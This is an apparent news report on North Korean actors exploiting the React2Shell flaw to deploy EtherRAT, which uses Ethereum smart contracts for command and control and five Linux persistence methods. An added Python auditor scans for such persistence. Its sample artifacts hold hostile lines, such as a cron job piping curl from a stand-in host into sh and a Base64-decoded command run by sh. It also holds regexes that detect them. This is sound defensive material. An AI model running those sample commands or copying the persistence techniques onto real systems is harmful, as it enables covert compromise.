Threat actors linked to North Korea have been observed exploiting a recently disclosed critical security vulnerability known as React2Shell in React Server Components (RSC) to deploy a new addition to their malicious arsenal, dubbed EtherRAT.
According to a report from cloud security firm Sysdig, EtherRAT utilizes Ethereum smart contracts for command-and-control (C2) communications, incorporates five independent persistence methods for Linux environments, and downloads its own Node.js runtime from official sources.
This activity aligns with a longstanding campaign referred to as Contagious Interview, where blockchain and Web3 developers are targeted through deceptive job offers, coding tasks, and video interviews that result in malware installation. The campaigns primarily lure victims via platforms like LinkedIn and Upwork, leading to the deployment of malware after initial engagement.
Security company Socket noted that this campaign is notably aggressive, taking advantage of JavaScript and cryptocurrency-centric workflows, underscoring its proficiency in exploiting npm ecosystems.
The attack exploits CVE-2025-55182, which carries the maximum severity score of 10.0. Attackers execute a Base64-encoded shell command, which downloads a shell script responsible for deploying the primary JavaScript implant. The script is fetched with curl, falling back to wget and then python3 if curl is unavailable. It prepares the environment by downloading Node.js v20.10.0, then drops an encrypted blob and an obfuscated JavaScript dropper.
The dropper’s function is to decrypt the EtherRAT payload using a hard-coded key and to initiate it using the downloaded Node.js binary. Its unique feature is the incorporation of EtherHiding for retrieving the C2 server address from an Ethereum smart contract at five-minute intervals, allowing for continuous updates even when the original URL goes offline.
Sysdig pointed out that this C2 mechanism employs a consensus voting system across nine public Ethereum remote procedure call (RPC) endpoints. This strategy protects against potential attacks, ensuring that a single compromised RPC node cannot misdirect the infected systems.
Upon contacting the C2 server, EtherRAT engages in a polling loop every 500 milliseconds, interpreting extended responses as JavaScript code for execution on the infected machine. Its persistence is guaranteed through multiple methods:
- Systemd user service
- XDG autostart entry
- Cron jobs
- .bashrc injection
- Profile injection
This multifaceted approach ensures the malware keeps running even after system reboots. Furthermore, EtherRAT has self-update capabilities, overwriting itself with new code from the C2 server after transmitting its current source code to an API endpoint.
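The five user-level persistence locations listed above are all plain text files a defender can inspect. The script below is an added example, not code from the article or from Sysdig's report: it audits those locations for entries that launch a Node.js binary from a home or hidden directory, pipe a download into a shell, or decode Base64 into a command. The regular expressions and the sample artifacts are constructed for this example (the paths, the `node20` directory name and `app.js` are assumptions, not published indicators), so tune them to your environment before relying on them.

```python
"""Audit Linux user-level persistence locations for EtherRAT-style entries.

Added example (not from the article or Sysdig); heuristics are assumptions.
"""
import os
import re
from dataclasses import dataclass, field
from pathlib import Path

# Heuristic rules chosen for this example. Each is (name, compiled regex).
RULES = [
    # a node binary executed from somewhere under a user's home directory
    ("node-from-home-dir",
     re.compile(r"(?:/home/[^/\s]+|~|\$HOME)/[^\s]*\bnode\b")),
    # curl/wget output piped straight into sh or bash
    ("download-piped-to-shell",
     re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b")),
    # base64 decoding on the command line (the report notes an encoded command)
    ("base64-decoded-command",
     re.compile(r"base64\s+(?:-d|--decode)")),
    # node launched from a dot-directory (e.g. ~/.cache/.../node)
    ("hidden-dir-node-launch",
     re.compile(r"/\.[A-Za-z0-9_-]+/[^\s]*\bnode\b")),
]


@dataclass
class Finding:
    location: str
    lineno: int
    line: str
    rules: list = field(default_factory=list)


def scan_text(location, text):
    """Return one Finding per line that matches at least one rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = [name for name, rx in RULES if rx.search(line)]
        if hits:
            findings.append(Finding(location, lineno, line.strip(), hits))
    return findings


def persistence_locations(home=None):
    """Files backing the five persistence methods (crontab is read separately)."""
    home = Path(home or os.path.expanduser("~"))
    paths = [home / ".bashrc", home / ".profile", home / ".bash_profile"]
    paths += sorted((home / ".config/systemd/user").glob("*.service"))  # systemd user service
    paths += sorted((home / ".config/autostart").glob("*.desktop"))     # XDG autostart
    return [p for p in paths if p.is_file()]


def audit_host(home=None, crontab_text=None):
    """Scan the real files on this host; pass `crontab -l` output as crontab_text."""
    findings = []
    for p in persistence_locations(home):
        findings += scan_text(str(p), p.read_text(errors="replace"))
    if crontab_text:
        findings += scan_text("crontab", crontab_text)
    return findings


# Constructed sample artifacts resembling the five persistence methods.
SAMPLE_ARTIFACTS = {
    "~/.config/systemd/user/update.service":
        "[Unit]\nDescription=Update\n[Service]\n"
        "ExecStart=/home/dev/.cache/node20/bin/node /home/dev/.cache/app.js\n"
        "Restart=always\n[Install]\nWantedBy=default.target\n",
    "~/.config/autostart/update.desktop":
        "[Desktop Entry]\nType=Application\n"
        "Exec=/home/dev/.cache/node20/bin/node /home/dev/.cache/app.js\nHidden=false\n",
    "crontab":
        "@reboot /home/dev/.cache/node20/bin/node /home/dev/.cache/app.js\n"
        "*/5 * * * * curl -fsSL http://example.invalid/x.sh | sh\n"
        "0 * * * * /usr/bin/backup.sh\n",
    "~/.bashrc":
        "alias ll='ls -l'\n"
        "(nohup $HOME/.cache/node20/bin/node $HOME/.cache/app.js >/dev/null 2>&1 &)\n",
    "~/.profile":
        "export PATH=$HOME/bin:$PATH\necho aGVsbG8= | base64 -d | sh\n",
}


def audit_samples():
    """Run the rules over the constructed artifacts (offline demonstration)."""
    out = []
    for loc, text in SAMPLE_ARTIFACTS.items():
        out += scan_text(loc, text)
    return out


if __name__ == "__main__":
    for f in audit_samples():
        print(f"{f.location}:{f.lineno} [{', '.join(f.rules)}] {f.line}")
```

On a live host, call `audit_host(crontab_text=subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout)` for the current user; the benign `backup.sh` cron line in the sample shows that ordinary scheduled jobs do not trip the rules, which is the false-positive check worth keeping in mind when widening the patterns.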
Recently, updates on the Contagious Interview campaign reveal its adaptation from npm to Microsoft’s Visual Studio Code. Victims are now encouraged to clone malicious repositories, which execute payloads upon opening the corresponding project in VS Code due to specific configurations, further extending the malware’s reach and sophistication.
Such developments suggest that North Korean actors may be evolving their strategies, posing complex challenges for cybersecurity defenses against these persistent threats.